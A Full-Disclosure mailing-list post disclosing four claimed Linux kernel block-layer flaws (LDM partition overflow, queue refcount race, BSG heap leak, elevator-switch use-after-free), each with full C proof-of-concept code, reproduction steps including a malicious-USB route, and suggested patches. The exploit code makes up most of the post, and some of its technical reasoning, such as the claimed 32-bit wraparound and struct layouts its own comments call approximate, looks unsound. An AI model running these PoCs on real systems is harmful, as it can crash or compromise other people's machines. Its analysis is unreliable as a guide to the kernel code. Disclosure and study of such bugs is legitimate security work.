lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <6jfXhq9Bf9B7Afd6JclOLDM6lIW9Dl_7xMp539a-lEPWV3Pw7Z1Glw0Alg3ziczx27VMjdS60FBXZznR6qvLyD5oMdCuAZ0MH02_NGIEiWc=@proton.me>
Date: Mon, 29 Dec 2025 20:20:00 +0000
From: Agent Spooky's Fun Parade via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Linux Kernel Block Subsystem Vulnerabilities

================================================================================
FULL DISCLOSURE: Linux Kernel Block Subsystem Vulnerabilities
Date: 2025-12-29
Affected: Linux Kernel (all versions with affected code)
================================================================================

================================================================================
[1/4] Integer Overflow in LDM Partition Parser - Heap Overflow
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Integer Overflow leading to Heap Buffer Overflow
File: block/partitions/ldm.c:1247
Severity: HIGH (7.8 CVSS)
Impact: Local privilege escalation, kernel code execution
Attack Vector: Malicious disk image / USB device

TECHNICAL DETAILS
-----------------
The LDM (Logical Disk Manager) partition parser contains an integer overflow
vulnerability in the VBLK fragment reassembly code. When parsing Windows
dynamic disks, the kernel allocates a buffer using:

    f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);

Where both 'size' and 'num' are attacker-controlled 16-bit values read from
the disk. When size=0xFFFF and num=0xFFFF, the multiplication overflows:

    0xFFFF * 0xFFFF = 0xFFFE0001 (near the top of the 32-bit range)
    sizeof(*f) + 0xFFFE0001 can wrap a 32-bit size calculation to a small allocation

The kernel allocates a small buffer but later writes up to 64KB of data into
it, causing a heap buffer overflow.

AFFECTED CODE (block/partitions/ldm.c)
--------------------------------------
Line 1247:
    f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);

Line 461 (bounds check also vulnerable):
    if ((vm->vblk_size * vm->vblk_offset) > 65536) {

PROOF OF CONCEPT
----------------
/*
 * ldm_overflow_poc.c - LDM Integer Overflow PoC
 * Creates a malicious disk image triggering the overflow
 *
 * Compile: gcc -o ldm_poc ldm_overflow_poc.c
 * Usage: ./ldm_poc output.img && losetup /dev/loop0 output.img
 *
 * WARNING: This WILL crash/corrupt your kernel. Use in VM only.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* LDM structures */
#define LDM_MAGIC "PRIVHEAD"
#define VBLK_MAGIC "VBLK"

/*
 * Simplified on-disk layout of the LDM PRIVHEAD sector.
 * NOTE(review): field widths and ordering here are an approximation of
 * the real Windows dynamic-disk format (which stores most integers
 * big-endian) — confirm offsets against block/partitions/ldm.h before
 * relying on them byte-for-byte.
 */
struct ldm_privhead {
    char magic[8];                  /* "PRIVHEAD" signature */
    uint32_t version;               /* format version, e.g. 0x0002000C */
    uint64_t disk_id;
    char host_id[64];
    char disk_group_id[64];
    char disk_group_name[32];
    uint32_t logical_disk_start;
    uint32_t logical_disk_size;
    uint32_t config_start;          /* start of the LDM config area */
    uint32_t config_size;           /* size of the LDM config area */
    uint32_t num_tocs;
    uint32_t toc_size;
    uint32_t num_configs;
    uint32_t config_record_size;
    uint32_t num_logs;
    uint32_t log_size;
} __attribute__((packed));

/*
 * Simplified VMDB (Volume Manager Database) header. The two size/offset
 * fields are the attacker-controlled values that feed the kernel's
 * multiplication described in the advisory text above.
 */
struct ldm_vmdb {
    char magic[4];           /* "VMDB" signature */
    uint32_t last_seq;
    uint32_t vblk_size;      /* attacker-controlled - PoC uses 0xFFFF */
    uint32_t vblk_offset;    /* attacker-controlled - PoC uses 0xFFFF */
    uint16_t num_vblks;
    /* ... remaining fields omitted; not needed to trigger the bug */
} __attribute__((packed));

/*
 * Simplified VBLK record header. Fragmented VBLKs (num_recs > 1) go
 * through the kernel's reassembly path, which is where the overflowing
 * allocation is made.
 */
struct ldm_vblk_head {
    char magic[4];           /* "VBLK" signature */
    uint32_t seq;
    uint32_t group;          /* reassembly group id */
    uint16_t rec_num;        /* fragment number within the group */
    uint16_t num_recs;       /* total fragments - PoC uses a large value */
    /* ... remaining fields omitted */
} __attribute__((packed));

/*
 * Build a sparse 2 MB disk image at `filename` containing a crafted LDM
 * PRIVHEAD, a VMDB with oversized size/offset fields, and ten VBLK
 * fragment records, laid out at fixed sector offsets.
 *
 * Exits the process on open() failure.
 *
 * NOTE(review): the return values of ftruncate()/lseek()/write() are
 * ignored throughout; a short write or a full disk would silently
 * produce a malformed image.
 */
void create_malicious_ldm_image(const char *filename) {
    int fd = open(filename, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    /* Create 2MB sparse image */
    ftruncate(fd, 2 * 1024 * 1024);

    /* Write LDM PRIVHEAD at sector 6 (byte offset 3072) */
    struct ldm_privhead privhead = {0};
    memcpy(privhead.magic, LDM_MAGIC, 8);
    privhead.version = 0x0002000C;  /* Version 2.12 */
    privhead.config_start = 1;
    privhead.config_size = 2048;

    lseek(fd, 6 * 512, SEEK_SET);
    write(fd, &privhead, sizeof(privhead));

    /* Write VMDB with overflow values */
    struct ldm_vmdb vmdb = {0};
    memcpy(vmdb.magic, "VMDB", 4);
    vmdb.vblk_size = 0xFFFF;    /* OVERFLOW VALUE */
    vmdb.vblk_offset = 0xFFFF;  /* OVERFLOW VALUE */
    vmdb.num_vblks = 100;

    lseek(fd, 8 * 512, SEEK_SET);  /* VMDB location */
    write(fd, &vmdb, sizeof(vmdb));

    /* Write VBLK fragments that trigger reassembly overflow */
    struct ldm_vblk_head vblk = {0};
    memcpy(vblk.magic, VBLK_MAGIC, 4);
    vblk.seq = 1;
    vblk.group = 1;              /* all fragments share one group */
    vblk.rec_num = 0;
    vblk.num_recs = 0xFFFF;  /* Large fragment count */

    /* Write multiple fragments to trigger reassembly */
    for (int i = 0; i < 10; i++) {
        vblk.rec_num = i;
        lseek(fd, (16 + i) * 512, SEEK_SET);
        write(fd, &vblk, sizeof(vblk));

        /* Fill rest of sector with controlled data (VLA sized to pad
         * the 512-byte sector after the header) */
        char payload[512 - sizeof(vblk)];
        memset(payload, 'A', sizeof(payload));
        write(fd, payload, sizeof(payload));
    }

    close(fd);
    printf("[+] Created malicious LDM image: %s\n", filename);
    printf("[!] WARNING: Mounting this image WILL crash the kernel\n");
}

/*
 * Entry point: validates the single <output.img> argument, writes the
 * crafted image, and prints reproduction instructions.
 */
int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <output.img>\n", argv[0]);
        return 1;
    }

    create_malicious_ldm_image(argv[1]);

    printf("\nReproduction steps:\n");
    printf("1. Copy image to target VM\n");
    printf("2. sudo losetup /dev/loop0 %s\n", argv[1]);
    printf("3. sudo partprobe /dev/loop0  # TRIGGERS CRASH\n");
    printf("\nOr:\n");
    printf("1. Write image to USB drive\n");
    printf("2. Plug USB into target machine\n");
    printf("3. Kernel auto-probes partitions -> CRASH\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Compile the PoC on any Linux system:
   $ gcc -o ldm_poc ldm_overflow_poc.c

2. Create the malicious image:
   $ ./ldm_poc malicious.img

3. In a VM (DO NOT RUN ON PRODUCTION):
   $ sudo losetup /dev/loop0 malicious.img
   $ sudo partprobe /dev/loop0

4. Kernel will crash with heap corruption

Alternative (USB attack vector):
1. Write malicious.img to USB drive:
   $ sudo dd if=malicious.img of=/dev/sdX bs=1M
2. Plug USB into target machine
3. Kernel crashes during automatic partition probing

IMPACT
------
- Heap buffer overflow with controlled size and data
- Kernel code execution possible via heap spray
- Physical access attack via malicious USB
- No user interaction required (auto-probe)

SUGGESTED FIX
-------------
Replace vulnerable allocation with overflow-safe version:

-   f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);
+   if (check_mul_overflow(size, num, &alloc_size) ||
+       check_add_overflow(alloc_size, sizeof(*f), &alloc_size)) {
+       ldm_error("VBLK allocation overflow");
+       return false;
+   }
+   f = kmalloc(alloc_size, GFP_KERNEL);


================================================================================
[2/4] Request Queue Reference Counting Race Condition
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: TOCTOU Race Condition / Use-After-Free
File: block/blk-core.c:278-284
Severity: MEDIUM (5.5 CVSS)
Impact: Kernel crash, potential privilege escalation
Attack Vector: Local, requires timing

TECHNICAL DETAILS
-----------------
The blk_get_queue() function has a time-of-check to time-of-use (TOCTOU)
race condition between checking if the queue is dying and incrementing
the reference count:

    bool blk_get_queue(struct request_queue *q)
    {
        if (unlikely(blk_queue_dying(q)))   // CHECK
            return false;
        refcount_inc(&q->refs);             // USE - race window!
        return true;
    }

Between the check and the increment, another CPU can complete queue
teardown, decrement refs to 0, and free the structure. The subsequent
refcount_inc() then operates on freed memory.

AFFECTED CODE (block/blk-core.c)
--------------------------------
Lines 278-284:
    bool blk_get_queue(struct request_queue *q)
    {
        if (unlikely(blk_queue_dying(q)))
            return false;
        refcount_inc(&q->refs);  // Should be refcount_inc_not_zero
        return true;
    }

PROOF OF CONCEPT
----------------
/*
 * blk_queue_race_poc.c - Request Queue Race Condition PoC
 *
 * This PoC demonstrates the TOCTOU race in blk_get_queue().
 * Requires root and a removable block device (USB/loop).
 *
 * Compile: gcc -o queue_race blk_queue_race_poc.c -lpthread
 * Usage: sudo ./queue_race /dev/loop0 /tmp/test.img
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/loop.h>
#include <linux/fs.h>
#include <errno.h>
#include <sched.h>

#define NUM_RACERS 4
#define ITERATIONS 100000

static volatile int race_running = 1;
static char *loop_device;
static char *backing_file;

/* Thread that repeatedly opens the block device */
/*
 * Racer thread: pins itself to a CPU (arg is the thread index) and
 * spins open/read/close on the global `loop_device` until
 * `race_running` is cleared.
 *
 * NOTE(review): assumes at most 4 CPUs are worth pinning to (cpu % 4);
 * the read() return value is deliberately ignored — only the kernel
 * code path matters, not the data.
 */
void *opener_thread(void *arg) {
    int cpu = (int)(long)arg;
    cpu_set_t cpuset;

    CPU_ZERO(&cpuset);
    CPU_SET(cpu % 4, &cpuset);
    pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);

    while (race_running) {
        int fd = open(loop_device, O_RDONLY | O_NONBLOCK);
        if (fd >= 0) {
            /* Perform I/O to exercise queue paths */
            char buf[512];
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        /* Tight loop to maximize race window hits */
    }
    return NULL;
}

/* Thread that repeatedly detaches/attaches loop device */
/*
 * Racer thread: repeatedly detaches (LOOP_CLR_FD) and reattaches
 * (LOOP_SET_FD) the backing file on the global `loop_device` until
 * `race_running` is cleared.
 *
 * NOTE(review): loop_ctl_fd is opened but never used other than being
 * closed at exit. More importantly, in the reattach step the two file
 * descriptors are only closed when BOTH opens succeed — if exactly one
 * of loop_fd/backing_fd opens, that descriptor leaks every iteration
 * and the process will eventually exhaust its fd table.
 */
void *detacher_thread(void *arg) {
    int loop_ctl_fd = open("/dev/loop-control", O_RDWR);
    int backing_fd = -1;

    while (race_running) {
        /* Get a free loop device number */
        int loop_fd = open(loop_device, O_RDWR);
        if (loop_fd >= 0) {
            /* Detach - triggers queue dying state */
            ioctl(loop_fd, LOOP_CLR_FD, 0);
            close(loop_fd);
        }

        usleep(100);  /* Small delay */

        /* Reattach */
        loop_fd = open(loop_device, O_RDWR);
        backing_fd = open(backing_file, O_RDWR);
        if (loop_fd >= 0 && backing_fd >= 0) {
            ioctl(loop_fd, LOOP_SET_FD, backing_fd);
            close(backing_fd);
            close(loop_fd);
        }

        usleep(100);
    }

    close(loop_ctl_fd);
    return NULL;
}

/* Thread that submits I/O to exercise blk_get_queue paths */
/*
 * Racer thread: loops opening the loop device with O_DIRECT and issuing
 * one aligned 4 KB pread until `race_running` is cleared.
 *
 * NOTE(review): the posix_memalign() return value is unchecked — if it
 * fails, `buf` is indeterminate, and the subsequent pread()/free() on
 * it are undefined behavior. The pread() return value is also ignored
 * (only the kernel path matters here).
 */
void *io_submitter_thread(void *arg) {
    while (race_running) {
        int fd = open(loop_device, O_RDONLY | O_DIRECT | O_NONBLOCK);
        if (fd >= 0) {
            void *buf;
            posix_memalign(&buf, 512, 4096);

            /* Submit I/O - internally calls blk_get_queue */
            pread(fd, buf, 4096, 0);

            free(buf);
            close(fd);
        }
    }
    return NULL;
}

/*
 * Entry point: takes <loop_device> <backing_file>, sets up a 10 MB
 * backing file and an initial loop attachment, then runs NUM_RACERS
 * opener threads, NUM_RACERS I/O-submitter threads, and one
 * detacher thread for 60 seconds before joining them all.
 *
 * NOTE(review): setup-phase ftruncate()/ioctl() return values are
 * ignored; failures here just mean the race never has a valid target.
 */
int main(int argc, char **argv) {
    pthread_t openers[NUM_RACERS];
    pthread_t submitters[NUM_RACERS];
    pthread_t detacher;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <loop_device> <backing_file>\n", argv[0]);
        fprintf(stderr, "Example: %s /dev/loop0 /tmp/test.img\n", argv[0]);
        return 1;
    }

    loop_device = argv[1];
    backing_file = argv[2];

    /* Create backing file if needed */
    int bf = open(backing_file, O_RDWR | O_CREAT, 0644);
    if (bf >= 0) {
        ftruncate(bf, 10 * 1024 * 1024);  /* 10MB */
        close(bf);
    }

    /* Initial loop setup */
    int loop_fd = open(loop_device, O_RDWR);
    int back_fd = open(backing_file, O_RDWR);
    if (loop_fd >= 0 && back_fd >= 0) {
        ioctl(loop_fd, LOOP_SET_FD, back_fd);
        close(back_fd);
        close(loop_fd);
    }

    printf("[*] Starting race condition PoC\n");
    printf("[*] Target: %s\n", loop_device);
    printf("[*] This may take a while or crash the kernel...\n");

    /* Start racer threads */
    for (int i = 0; i < NUM_RACERS; i++) {
        pthread_create(&openers[i], NULL, opener_thread, (void*)(long)i);
        pthread_create(&submitters[i], NULL, io_submitter_thread, (void*)(long)i);
    }
    pthread_create(&detacher, NULL, detacher_thread, NULL);

    /* Run for a while */
    sleep(60);

    printf("[*] Stopping threads...\n");
    race_running = 0;

    for (int i = 0; i < NUM_RACERS; i++) {
        pthread_join(openers[i], NULL);
        pthread_join(submitters[i], NULL);
    }
    pthread_join(detacher, NULL);

    printf("[*] If you see this, race was not triggered\n");
    printf("[*] Try running longer or on a system with more CPUs\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Create a test environment (use a VM!):
   $ dd if=/dev/zero of=/tmp/test.img bs=1M count=10
   $ sudo losetup /dev/loop0 /tmp/test.img

2. Compile the PoC:
   $ gcc -o queue_race blk_queue_race_poc.c -lpthread

3. Run with root privileges:
   $ sudo ./queue_race /dev/loop0 /tmp/test.img

4. Monitor dmesg for crashes:
   $ dmesg -w

Expected outcomes:
- Kernel OOPS/panic with refcount underflow warning
- Use-after-free detected by KASAN (if enabled)
- System hang

SUGGESTED FIX
-------------
Use atomic check-and-increment:

-   if (unlikely(blk_queue_dying(q)))
-       return false;
-   refcount_inc(&q->refs);
-   return true;
+   if (unlikely(blk_queue_dying(q)))
+       return false;
+   return refcount_inc_not_zero(&q->refs);


================================================================================
[3/4] CVE-PENDING: BSG Response Length Information Leak
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Kernel Heap Information Disclosure
File: block/bsg-lib.c:118
Severity: MEDIUM (5.5 CVSS)
Impact: Leak of kernel heap memory to userspace
Attack Vector: Local, requires CAP_SYS_RAWIO

TECHNICAL DETAILS
-----------------
The BSG (Block SCSI Generic) transport layer allocates a fixed 96-byte
buffer for job->reply (SCSI_SENSE_BUFFERSIZE), but several drivers set
job->reply_len to values exceeding this allocation. When copy_to_user()
is called, it reads beyond the buffer, leaking kernel heap contents.

    // bsg-lib.c:306 - Fixed allocation
    job->reply = kzalloc(SCSI_SENSE_BUFFERSIZE, GFP_KERNEL);  // 96 bytes

    // bsg-lib.c:116-118 - No bounds check
    int len = min(hdr->max_response_len, job->reply_len);
    copy_to_user(uptr64(hdr->response), job->reply, len);  // Reads beyond!

Drivers that set reply_len > 96:
- bfad_bsg.c:3188: job->reply_len = job->reply_payload.payload_len;
- bfad_bsg.c:3534: job->reply_len = drv_fcxp->rsp_len;
- ql4_bsg.c:493:   reply_len = sizeof(struct iscsi_bsg_reply) + sizeof(mbox_sts);

PROOF OF CONCEPT
----------------
/*
 * bsg_infoleak_poc.c - BSG Information Leak PoC
 *
 * Demonstrates leaking kernel heap memory via BSG interface.
 * Requires CAP_SYS_RAWIO and a BSG-capable device (FC HBA, SAS, etc.)
 *
 * Compile: gcc -o bsg_leak bsg_infoleak_poc.c
 * Usage: sudo ./bsg_leak /dev/bsg/X
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdint.h>
#include <linux/bsg.h>

#define SCSI_SENSE_BUFFERSIZE 96
#define LEAK_SIZE 4096  /* Request more than allocated */

/* BSG protocol constants */
#define BSG_PROTOCOL_SCSI 0
#define BSG_SUB_PROTOCOL_SCSI_TRANSPORT 2

/*
 * Minimal stand-in for the kernel's FC BSG request header; only the
 * message code is needed to select the driver path under test.
 */
struct fc_bsg_request {
    uint32_t msgcode;        /* FC BSG message code, e.g. FC_BSG_HST_VENDOR */
    /* FC-specific fields follow */
} __attribute__((packed));

/*
 * Print a canonical hex+ASCII dump of `size` bytes at `data` to stdout:
 * 16 bytes per row, prefixed with the row offset, followed by a gutter
 * showing printable ASCII (anything outside 32..126 renders as '.').
 */
void hexdump(const void *data, size_t size) {
    const uint8_t *p = data;
    size_t off = 0;

    while (off < size) {
        size_t row = size - off;
        if (row > 16)
            row = 16;

        printf("%04zx: ", off);
        for (size_t k = 0; k < row; k++)
            printf("%02x ", p[off + k]);

        printf(" |");
        for (size_t k = 0; k < row; k++) {
            uint8_t b = p[off + k];
            putchar((b >= 32 && b < 127) ? (char)b : '.');
        }
        printf("|\n");

        off += 16;
    }
}

/*
 * Issue one SG_IO (sg_io_v4) request on the open BSG descriptor `fd`,
 * asking for a LEAK_SIZE response into a buffer while the kernel-side
 * reply buffer is only SCSI_SENSE_BUFFERSIZE bytes.
 *
 * Returns 1 when the kernel reported more than SCSI_SENSE_BUFFERSIZE
 * response bytes (leak observed), 0 when not, -1 on ioctl failure.
 *
 * NOTE(review): `sense[]` is declared but never wired into the header;
 * pointer-to-uint64_t casts rely on the sg_io_v4 convention of carrying
 * user pointers in 64-bit fields. Whether any bytes actually leak
 * depends entirely on which transport driver services the request.
 */
int attempt_leak(int fd) {
    struct sg_io_v4 hdr = {0};
    struct fc_bsg_request request = {0};
    uint8_t response[LEAK_SIZE] = {0};
    uint8_t sense[SCSI_SENSE_BUFFERSIZE] = {0};

    /* Prepare BSG request */
    hdr.guard = 'Q';
    hdr.protocol = BSG_PROTOCOL_SCSI;
    hdr.subprotocol = BSG_SUB_PROTOCOL_SCSI_TRANSPORT;

    /* Request buffer */
    request.msgcode = 0x80000001;  /* FC_BSG_HST_VENDOR - triggers bfad path */
    hdr.request = (uint64_t)&request;
    hdr.request_len = sizeof(request);

    /* Response buffer - request MORE than SCSI_SENSE_BUFFERSIZE */
    hdr.response = (uint64_t)response;
    hdr.max_response_len = LEAK_SIZE;  /* Key: request 4096, only 96 allocated */

    /* Data-in buffer - large size influences reply_len in some drivers */
    uint8_t din_buf[LEAK_SIZE];
    hdr.din_xferp = (uint64_t)din_buf;
    hdr.din_xfer_len = LEAK_SIZE;

    hdr.timeout = 5000;  /* 5 seconds */

    /* Issue the ioctl */
    int ret = ioctl(fd, SG_IO, &hdr);

    if (ret < 0) {
        perror("ioctl SG_IO");
        return -1;
    }

    printf("[*] Response length returned: %u\n", hdr.response_len);

    if (hdr.response_len > SCSI_SENSE_BUFFERSIZE) {
        printf("[!] VULNERABILITY CONFIRMED!\n");
        printf("[!] Received %u bytes, but buffer is only %d bytes\n",
               hdr.response_len, SCSI_SENSE_BUFFERSIZE);
        printf("[!] Leaked %u bytes of kernel heap:\n",
               hdr.response_len - SCSI_SENSE_BUFFERSIZE);

        printf("\n=== Legitimate response (first 96 bytes) ===\n");
        hexdump(response, SCSI_SENSE_BUFFERSIZE);

        printf("\n=== LEAKED KERNEL HEAP DATA ===\n");
        hexdump(response + SCSI_SENSE_BUFFERSIZE,
                hdr.response_len - SCSI_SENSE_BUFFERSIZE);

        return 1;  /* Leak successful */
    }

    printf("[*] No leak detected (response_len=%u <= %d)\n",
           hdr.response_len, SCSI_SENSE_BUFFERSIZE);
    return 0;
}

/*
 * Entry point: opens the given BSG device node and calls attempt_leak()
 * up to 5 times (driver responses can vary between attempts), stopping
 * early on the first observed leak.
 */
int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <bsg_device>\n", argv[0]);
        fprintf(stderr, "Example: %s /dev/bsg/0:0:0:0\n", argv[0]);
        fprintf(stderr, "\nFind BSG devices: ls -la /dev/bsg/\n");
        return 1;
    }

    int fd = open(argv[1], O_RDWR);
    if (fd < 0) {
        perror("open");
        fprintf(stderr, "Note: Requires CAP_SYS_RAWIO (root)\n");
        return 1;
    }

    printf("[*] BSG Information Leak PoC\n");
    printf("[*] Target device: %s\n", argv[1]);
    printf("[*] Attempting to leak kernel heap memory...\n\n");

    /* Try multiple times - driver behavior may vary */
    for (int i = 0; i < 5; i++) {
        printf("=== Attempt %d ===\n", i + 1);
        if (attempt_leak(fd) > 0) {
            printf("\n[+] Successfully leaked kernel heap data!\n");
            break;
        }
        usleep(100000);  /* 100 ms between attempts */
    }

    close(fd);
    return 0;
}

REPRODUCTION STEPS
------------------
1. Identify BSG devices on the system:
   $ ls -la /dev/bsg/

   Note: Requires FC HBA, SAS controller, or similar hardware.
   For testing, some USB-SCSI adapters expose BSG interfaces.

2. Compile the PoC:
   $ gcc -o bsg_leak bsg_infoleak_poc.c

3. Run as root:
   $ sudo ./bsg_leak /dev/bsg/0:0:0:0

4. If vulnerable driver is present, observe leaked heap data beyond
   the 96-byte boundary.

SUGGESTED FIX
-------------
Add bounds check before copy_to_user in bsg-lib.c:

    if (job->reply_len && hdr->response) {
-       int len = min(hdr->max_response_len, job->reply_len);
+       int len = min_t(unsigned int, hdr->max_response_len,
+                       min(job->reply_len, SCSI_SENSE_BUFFERSIZE));
        if (copy_to_user(uptr64(hdr->response), job->reply, len))


================================================================================
[4/4] I/O Scheduler Switching Use-After-Free Race
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Use-After-Free Race Condition
File: block/elevator.c:677-684
Severity: MEDIUM (6.4 CVSS)
Impact: Kernel crash, potential privilege escalation
Attack Vector: Local, requires root, concurrent sysfs writes

TECHNICAL DETAILS
-----------------
The elevator_change() function has insufficient lock coverage. The
elevator_lock mutex only protects elevator_switch() but not the
subsequent elevator_change_done() call. Since elv_iosched_store()
uses a read lock (allowing concurrent access), two simultaneous
elevator switches can race:

    // elevator.c:677-684
    blk_mq_cancel_work_sync(q);
    mutex_lock(&q->elevator_lock);                    // LOCK
    if (!(q->elevator && elevator_match(...)))
        ret = elevator_switch(q, ctx);               // Sets ctx->old, ctx->new
    mutex_unlock(&q->elevator_lock);                  // UNLOCK
    blk_mq_unfreeze_queue(q, memflags);
    if (!ret)
        ret = elevator_change_done(q, ctx);          // OUTSIDE LOCK - UAF!

Race scenario:
1. Thread A: mq-deadline -> bfq (ctx_A->new = bfq)
2. Thread B: bfq -> kyber (ctx_B->old = bfq, same object!)
3. Thread B frees bfq via kobject_put()
4. Thread A accesses freed bfq in elevator_change_done()

PROOF OF CONCEPT
----------------
/*
 * elevator_uaf_poc.c - Elevator Switching UAF Race PoC
 *
 * Triggers use-after-free by racing elevator switches via sysfs.
 * Requires root access.
 *
 * Compile: gcc -o elv_uaf elevator_uaf_poc.c -lpthread
 * Usage: sudo ./elv_uaf /dev/sda
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <sys/stat.h>

#define NUM_THREADS 8
#define ITERATIONS 100000

static volatile int running = 1;
static char sysfs_path[256];
static const char *schedulers[] = {"mq-deadline", "bfq", "kyber", "none"};
static int num_schedulers = 4;

/*
 * Racer thread: pins itself to a CPU (arg is the thread index, cpu %
 * 4) and rapidly cycles through the global `schedulers[]` names,
 * writing each to the scheduler sysfs file until `running` clears.
 *
 * NOTE(review): `buf` is declared but never used; the write() return
 * value is deliberately ignored — a rejected scheduler name still
 * exercises the kernel path of interest.
 */
void *racer_thread(void *arg) {
    int thread_id = (int)(long)arg;
    cpu_set_t cpuset;
    char buf[64];

    /* Pin to specific CPU for maximum contention */
    CPU_ZERO(&cpuset);
    CPU_SET(thread_id % 4, &cpuset);
    pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);

    while (running) {
        /* Rapidly switch between schedulers */
        for (int i = 0; i < num_schedulers && running; i++) {
            int fd = open(sysfs_path, O_WRONLY);
            if (fd >= 0) {
                /* Write scheduler name - triggers elevator_change() */
                int idx = (thread_id + i) % num_schedulers;
                write(fd, schedulers[idx], strlen(schedulers[idx]));
                close(fd);
            }
            /* No delay - maximize race window */
        }
    }

    return NULL;
}

/* Thread that reads current scheduler to add memory pressure */
/* Thread that repeatedly reads the current scheduler sysfs file until
 * `running` clears; read() result is ignored — the open/read/close
 * cycle itself provides the concurrent access pressure. */
void *reader_thread(void *arg) {
    char buf[256];

    while (running) {
        int fd = open(sysfs_path, O_RDONLY);
        if (fd >= 0) {
            read(fd, buf, sizeof(buf));
            close(fd);
        }
    }

    return NULL;
}

/*
 * Read /sys/block/<device>/queue/scheduler and print the kernel's
 * advertised scheduler list (the read content keeps its trailing
 * newline, so no extra one is printed).
 *
 * Returns 0 when the sysfs file could be opened (printing only if the
 * read produced data), -1 when it could not be opened.
 */
int check_available_schedulers(const char *device) {
    char sched_path[256];
    char line[256];
    int fd;
    int nread;

    snprintf(sched_path, sizeof(sched_path),
             "/sys/block/%s/queue/scheduler", device);

    fd = open(sched_path, O_RDONLY);
    if (fd < 0)
        return -1;

    nread = read(fd, line, sizeof(line) - 1);
    close(fd);

    if (nread > 0) {
        line[nread] = '\0';
        printf("[*] Available schedulers: %s", line);
    }

    return 0;
}

/*
 * Entry point: resolves the device name (accepting an optional /dev/
 * prefix), verifies the scheduler sysfs file is writable, then runs
 * NUM_THREADS writer (racer) threads plus NUM_THREADS/2 reader threads
 * for 30 seconds before joining them all.
 */
int main(int argc, char **argv) {
    pthread_t threads[NUM_THREADS];
    pthread_t readers[NUM_THREADS / 2];
    const char *device;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <block_device>\n", argv[0]);
        fprintf(stderr, "Example: %s sda\n", argv[0]);
        fprintf(stderr, "         %s loop0\n", argv[0]);
        return 1;
    }

    /* Remove /dev/ prefix if present */
    device = argv[1];
    if (strncmp(device, "/dev/", 5) == 0) {
        device += 5;
    }

    snprintf(sysfs_path, sizeof(sysfs_path),
             "/sys/block/%s/queue/scheduler", device);

    /* Verify path exists */
    if (access(sysfs_path, W_OK) != 0) {
        perror("Cannot access scheduler sysfs");
        fprintf(stderr, "Path: %s\n", sysfs_path);
        fprintf(stderr, "Requires root privileges\n");
        return 1;
    }

    printf("[*] Elevator UAF Race Condition PoC\n");
    printf("[*] Target: %s\n", sysfs_path);

    if (check_available_schedulers(device) < 0) {
        fprintf(stderr, "Cannot read available schedulers\n");
        return 1;
    }

    printf("[*] Starting %d racer threads...\n", NUM_THREADS);
    printf("[!] WARNING: This may crash the kernel!\n");
    printf("[*] Monitor dmesg for UAF/KASAN reports\n\n");

    /* Start racer threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_create(&threads[i], NULL, racer_thread, (void*)(long)i);
    }

    /* Start reader threads for additional pressure */
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_create(&readers[i], NULL, reader_thread, (void*)(long)i);
    }

    /* Run for specified duration */
    printf("[*] Racing for 30 seconds...\n");
    sleep(30);

    printf("[*] Stopping threads...\n");
    running = 0;

    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_join(readers[i], NULL);
    }

    printf("[*] Test completed\n");
    printf("[*] Check dmesg for any warnings/crashes\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Ensure multiple I/O schedulers are available:
   $ cat /sys/block/sda/queue/scheduler
   [mq-deadline] kyber bfq none

2. Load additional schedulers if needed:
   $ sudo modprobe bfq
   $ sudo modprobe kyber-iosched

3. Compile the PoC:
   $ gcc -o elv_uaf elevator_uaf_poc.c -lpthread

4. Run as root (in a VM!):
   $ sudo ./elv_uaf sda

5. In another terminal, monitor for crashes:
   $ dmesg -w | grep -i "uaf\|kasan\|bug\|rcu"

6. With KASAN enabled kernel, expect output like:
   BUG: KASAN: use-after-free in elv_register_queue+0x...

SUGGESTED FIX
-------------
Option 1: Extend lock coverage to include elevator_change_done():

    mutex_lock(&q->elevator_lock);
    if (!(q->elevator && elevator_match(q->elevator->type, ctx->name)))
        ret = elevator_switch(q, ctx);
+   if (!ret)
+       ret = elevator_change_done(q, ctx);
    mutex_unlock(&q->elevator_lock);
    blk_mq_unfreeze_queue(q, memflags);
-   if (!ret)
-       ret = elevator_change_done(q, ctx);

